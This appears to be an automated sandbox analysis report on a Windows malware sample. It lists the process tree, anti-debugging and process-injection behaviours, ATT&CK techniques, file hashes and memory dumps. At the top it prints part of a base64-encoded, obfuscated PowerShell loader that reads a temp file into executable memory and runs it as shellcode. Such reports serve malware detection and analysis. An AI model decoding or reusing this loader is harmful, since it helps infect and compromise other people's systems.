OAEQARQBGACAATgBvAG4AZgBhAHIAbQA1ACAAdAByAGUAbgBjAGgAYwBvAGEAdAAgAGgAZQBzAHQAZQBwAHIAIABHAEUATgBBAFYATgBFAE4ARQBUACAARABlAGYAZQBhAHQAaQAxACAAVABqAGUAbgBzAHQAdgBpADIAIABUAFIAQQBJACAAawBvAHIAcgBpAGQAbwByACAARgBKAEUAUgBCAE8AIABQAEkAQwBJAEYAIABUAGUAawBzAHQAcwB0AHUAIABlAG4AdABlAHIAbwBjAHIAaQAgAFUAYgBlAGgAZQAgAFIAaABvAG0AYgBvAGcAZQBuAGkANgAgAGUAcgBpAG4AcwBnAGEAcgBkAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAG8AdgBuAHMAYwBhAHIAZgBwACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAZgBzAGsAYQBhAHIAZQB0ACIAIAANAAoAJABRAHUAaQBsAGwAMwA9ADAAOwANAAoAJABRAHUAaQBsAGwAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABRAHUAaQBsAGwAOAA9AFsAUQB1AGkAbABsADEAXQA6ADoATQB1AHoAdQBuAG4AYQAoAC0AMQAsAFsAcgBlAGYAXQAkAFEAdQBpAGwAbAAzACwAMAAsAFsAcgBlAGYAXQAkAFEAdQBpAGwAbAA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACMATgBvAHYAZQBtAGIAZQA2ACAAVAByAG8AbABkAHMAcABlAGoAbAA3ACAAUgBPAFMASwBJAEwARAAgAE8AcgB0AGgAbwBwAGUAZABpADEAIABNAG8AbgBpAHQAbwByAHMAaAAgAFMAdAB1AG0AcABlAHQAYgBlAGgAMQAgAFMAawB2AGUAIABQAHIAbwBzAGEAaQBzAHQAcwAxACAAQgBJAFMAVABBAE4ARABTAEgASgAgAG0AaQBzAGQAYQB0AGkAIABDAE8AUgBPAFQAIABCAHIAbgBlAGIAYQBsAGwAZQB0ADIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABoAGUAZwA1ACIAIAANAAoAJABRAHUAaQBsAGwAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwAUwBKAFUAUwAuAGQAYQB0ACIADQAKACMATwBwAHIAeQBrAG4AaQBuACAAawBvAG0AbQB1AG4AZQBzAGsAYQAgAEQAZQBtAGkANwAgAE4ATwBOAEQARQBOAFMARQAgAEcAYQBsAGQAOQAgAFIAbQBlAGIAcgB0AHQAMgAgAGEAYgBzAG8AbAB2AGUAcgBpACAARwBSAEkAUABUAFAARQBSAFMATwAgAEIAbABlAHAAaAA3ACAAQgBvAHIAdABlAGwAaQA4ACAATQBhAHMAcwBlAGsAaABvAHQAMgAgAG4AbwByAHQAaABiAG8AdQBuAGQAIABDAEkAUgBLAFUAUwBNAEEAIABGAHIAZwBlAHIAaQAgAFIARQBTAEUAQQBUAEsATwAgAGEAcgBhAGIAZQBzAGsAcwBiAG4AIABGAE8AUgBGAFIAWQBTAE4ASQBOACAATwBWAEUAUgBDAE8AVgAgAFMASABJAFYAQQBJAFMAIABCAEEATABEAEYAQQBDAEUARAAgAFUAbwBwAHMAdAB0ADkAIABHAGUAbgBlAHIAbwB1AHMAZgB5ACAAdgBhAHIAaQAgAFIAZQBjAG8AbgBuAG8AOAAgAE8AcgB0AGgAbwBzAHQANgAgAFMAUABJAE4ARABIAFIAUgAgAEQAZQBsAHMAcABlAGMAaQAxACAAUwBUAEEATgBHAEIASQBEAFMAIABNAGUAbgB1AGkAcwBlAHIAIABPAHYAZQByAHMAdABlAGEAIABEAEQASwBFACAADQAKACQAUQB1AGkAbABsADQAPQBbAFEAdQBpAGwAbAAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQAUQB1AGkAbABsADIALAAyADEANAA3ADQAOAAzADYANAA4ACwAMQAsADAALAAzACwAMQAyADgALAAwACkADQAKACMATAB5AGcAdAAgAGIAYQBsAGwAZQAgAEgAYQB2AGUAbABhAGwAaQBrAHUAIABkAG8AbQBtAGUAcgB2AGEAIABVAG4AawBuAGUAbABsAGUAZABwADQAIABzAGEAYwBjACAAVAByAGEAbgAzACAAQwBZAFMAVABPAEUAUABJACAAcgBlAHMAaQBkAGUAcgBmACAAZgB1AGsAcwBzAHYAIABWAEkAVABVAFAARQBSAEEAVAAgAGgAZQB0AGUAIABiAGUAZgBsAGoAZQB0AGIAIABUAHIAbwBuAGIAIABQAEwARQBBAFQATABFAFMAUwAgAEEAZgByAGkAZABzAGUAbgBlACAAVQBOAFMAVABVAE4ATgBFACAAawBhAHUAdABpAG8AbgAgAEEARQBSAEEAIABLAG8AYgBsAGUANQAgAHIAdQBzAHMAbwBwAGgAaQBsAGkAIABzAGUAawBzAG8AZwB0ACAAZwBsAG8AYgB1AGwAbwB1ACAAQQBQAEkAQwBLAEIAQQAgAFUARABTAEwAQQBHACAAZgByAGUAbQBzAGEAdAAgAE0AZQBsAGwAZQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBMAGUAdwBuAGkAdABlAGEAZwBlACIAIAANAAoAJABRAHUAaQBsAGwANQA9ADAAOwANAAoAIwBTAGsAaQBsAGwAZQB2ADMAIABTAFUAQgBDAEwAQQBWACAARgBsAGcAZQBzAGUAZABsAGUAbgAgAEkAbgBkAHMAawByAGkAZgB0AGUAMgAgAFMAQwBVAFQAQwBIAEUATwBOACAAQgBlAHIAYgBlAHIAawBhADEAIABJAGwAbABlAGcAaQBiAGwANAAgAEUAbABlAGsAdAA4ACAAVABlAGcAbgBlAHMAdAB1AGUAIABCAHIAYQBuAGQAaABhAG4AZQByADcAIAB6AGUAaQB0AHYAYQAgAE0AQQBFAFMAIABEAGkAYQBtAG8AbgBkAHcAaQAgAGUAawBzAG8AcgBjAGkAIABpAG4AYwBsACAAQQBMAEwARQBHAE8AIABKAGUAcgByAHkAYgA1ACAAUwBwAGUAYwBpAGEAbAB1AGQANQAgAEcAZQBuAG8AcAAgAHUAbABkAHQAcgBqACAAUwBhAGcAZgAgAFMAZQBtAGkAZABlAGYAZQA0ACAAUwBrAGoAbwBsAGQAYgByADUAIABLAE4AUwBCAEUAUwAgAGkAbgB2AGUAcwB0AGUAIABQAG8AbgB0AGUAZgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAdQBsAHQAcgBhAHMAdAAiACAADQAKAFsAUQB1AGkAbABsADEAXQA6ADoAUgBlAGEAZABGAGkAbABlACgAJABRAHUAaQBsAGwANAAsACQAUQB1AGkAbABsADMALAA2ADcAMgAyADMALABbAHIAZQBmAF0AJABRAHUAaQBsAGwANQAsADAAKQANAAoAIwBTAFQATwBGAFQASQBMAEYAUgBTACAAZwBvAHYAZQByAG4AbQAgAEsAaQBuAGEAcwB2AGkAIABQAGEAcgBhAG0AbwAgAEkAbgBkAHQAZwB0AHMAIABQAE8AQgBFACAAVABBAEIASQBUAFUAIABHAHUAbABkAHYAcgBkAGkAZQByADEAIABNAFAAQgBTAEQASQBBAEMAVAAgAFMAdABhAG4AZABzAGUAZABlAHMANgAgAFAAcgBvAGcAcgBhAG0AbQA5ACAAUgBhAGsAcgAyACAAQwBFAEQARQBSAFQAUgBFAFQARgAgAG8AdgBlAHIAcwBlAG4AIAB2AGEAbgBkACAAcwBhAG4AZwBhAHIAcwAgAE8AVABUAEUAIABIAEUAUABBACAATQBPAE4ARQBZAE0AQQAgAHMAdgByAGQAZgBzAHQAZQByAG4AIAB1AG4AZABlAHIAYgB1AHQAbABlACAAUABSAE8AVABPAEsATwBMAEwAUgAgAFIAVQBGAEYARQBOAEUAUwBNAEkAIABTAHQAbwByADMAIABWAEUATgBFAE4ATwBTAEkAUAAgAFUARABCAFkARwBOAEkATgBHACAASABlAHMAaQAxACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgB0AHIAZQBuACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE4ATwBOAEUAVgBBAEQASQBOACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAE4AbwBuAHAAOQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBIAG8AbABsAHkAbwB2AGUAcgA1ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAcgBlAGQAZQB0AGUAcgA5ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEMAaQBiAGEAdAA4ACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEEAdgBsAHMAaABpAG4AZwBzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMATgBFAEcAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIAdQBuAHMAaQBjAGsAZQByAG4AIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARgBvAGwAawAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBmAGwAeQB2AGUAcgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgB1AG4AaQBtAGUAZABpAGEAbABzACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFIARQBUAEYAUgAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBNAFUAUgBTACIAIAANAAoAWwBRAHUAaQBsAGwAMQBdADoAOgBMAGkAbgBlAEQARABBACgAMQAwACwAIAAxADEALAAgADEAMgAsACAAMQA0ACwAJABRAHUAaQBsAGwAMwAsACAAMAApAA0ACgANAAoA"
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\alfupnt0\alfupnt0.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2348

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8C5F.tmp" "c:\Users\Admin\AppData\Local\Temp\alfupnt0\CSC10677DB01789457BA284A618262945EF.TMP"
4⤵
PID:1520

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1040

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

1

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

1

T1158

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES8C5F.tmp
MD5
683516cd6b122c323b0c48cf251fed50

SHA1
01615c419cdea0e6b98831fb6dfcf1152cf3346a

SHA256
590309458c3d2bc8c2edd36bf3cb5fd348d8ce3696ccdb49ade15fb7b19c8ebf

SHA512
858a20c9a82497b810faa0f5e14e9bef1333f572115f5c94690992b246b369808826bed33a9b940e67ad5c5255f41869823e1731772928cacd8c01e2e11a95eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\SJUS.dat
MD5
41d834d598a20c22be84fdda4ea9de0d

SHA1
59d72032fb28f84c6d2cbb4d9f6ad4059d65e6de

SHA256
01d7a35dd43610a1cbe35b969ceebb0d9a06940ff29da71066ab4978e5b61a75

SHA512
eb3effd491d7fb8e9c046f66f9afb82c45c14fb5eeb8c01490c724384ba1c6e663e3b12eea33add4820c94192353b6ab56826e87477f33bf7fef586473b75141

Download Submit
C:\Users\Admin\AppData\Local\Temp\alfupnt0\alfupnt0.dll
MD5
908d416dfee76a039a3312866e7bb9b8

SHA1
0e7c5f526474c7dc4f3408f26bfd84f7e25654f2

SHA256
8a958b34fac9a79491033507272776c43b412fdf5f7a981690fca520829878a1

SHA512
4a859a8747e348ea677e2e42fc7424ba933f23e87b92a4d75fdf7fc20bb277f438d52846f328f1011bc4b19ae1e851687203e26a6bbb88dc42d623f4165d042c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\alfupnt0\CSC10677DB01789457BA284A618262945EF.TMP
MD5
ae5a07277bf1fd338216fd10e95515c6

SHA1
dfea7fa0b37bfd2ad5a4660e41a30211029078eb

SHA256
55586b29570301cb35f474467b8051b8f4b5f6a10f66456361f52e0b40a05678

SHA512
b9ba1e5d582176249c9784f805002afef3dae95222786ddd511d89dbd968326068914f8c903b9438c754d7ab198391284384b89bbd0c3f324a90c5e1fb696e76

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\alfupnt0\alfupnt0.0.cs
MD5
132f91790d899096b0e07d5b01acafd1

SHA1
3b8eae1cc8dea91362da5bb3be48e6ba04674ed3

SHA256
be4042b15ae80934b9ff2f6bb5814d71d83fc65fd64c7877b264653c94bc3c01

SHA512
2d752e3d6ed8382313c338eda29df1c7ae1c0b19e7d5a92fc201ba386579512c863d39096a7a56e75c77c389cfb9acc76ddf83c79e23bd3540d8e06929dfb4cb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\alfupnt0\alfupnt0.cmdline
MD5
c26abb2be030f78656b9c3af78064a10

SHA1
f59f90e64150db21610795cb4e5d032dc1b60b49

SHA256
b5adae30e18b735a5ee614b5dec4f58b61019ca41736910d577d816db8798ae1

SHA512
4d28df01e4b46a4e67809f46a3f9914757a4a5748108669bf7a6d71db6d051411f9d75ce7f85607305fdcc58bf064560749a85eacc6b5937182328ae270cb6cb

Download Submit
memory/1040-156-0x0000000077600000-0x00000000777A3000-memory.dmp

Filesize
1.6MB

Download
memory/1040-155-0x00007FFB36B10000-0x00007FFB36D05000-memory.dmp

Filesize
2.0MB

Download
memory/1040-154-0x0000000001070000-0x0000000001170000-memory.dmp

Filesize
1024KB

Download
memory/4888-136-0x0000000005B60000-0x0000000005BC6000-memory.dmp

Filesize
408KB

Download
memory/4888-148-0x0000000007500000-0x0000000007522000-memory.dmp

Filesize
136KB

Download
memory/4888-141-0x0000000007430000-0x000000000744A000-memory.dmp

Filesize
104KB

Download
memory/4888-140-0x0000000007C90000-0x000000000830A000-memory.dmp

Filesize
6.5MB

Download
memory/4888-138-0x0000000006350000-0x000000000636E000-memory.dmp

Filesize
120KB

Download
memory/4888-137-0x0000000005BD0000-0x0000000005C36000-memory.dmp

Filesize
408KB

Download
memory/4888-130-0x0000000004EC0000-0x0000000004EF6000-memory.dmp

Filesize
216KB

Download
memory/4888-135-0x0000000005470000-0x0000000005492000-memory.dmp

Filesize
136KB

Download
memory/4888-147-0x0000000007550000-0x00000000075E6000-memory.dmp

Filesize
600KB

Download
memory/4888-139-0x0000000004EB5000-0x0000000004EB7000-memory.dmp

Filesize
8KB

Download
memory/4888-149-0x0000000008310000-0x00000000088B4000-memory.dmp

Filesize
5.6MB

Download
memory/4888-134-0x0000000004EB2000-0x0000000004EB3000-memory.dmp

Filesize
4KB

Download
memory/4888-151-0x0000000007610000-0x0000000007C8A000-memory.dmp

Filesize
6.5MB

Download
memory/4888-152-0x00007FFB36B10000-0x00007FFB36D05000-memory.dmp

Filesize
2.0MB

Download
memory/4888-153-0x0000000077600000-0x00000000777A3000-memory.dmp

Filesize
1.6MB

Download
memory/4888-132-0x0000000074BE0000-0x0000000075390000-memory.dmp

Filesize
7.7MB

Download
memory/4888-133-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

Filesize
4KB

Download
memory/4888-131-0x0000000005530000-0x0000000005B58000-memory.dmp

Filesize
6.2MB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads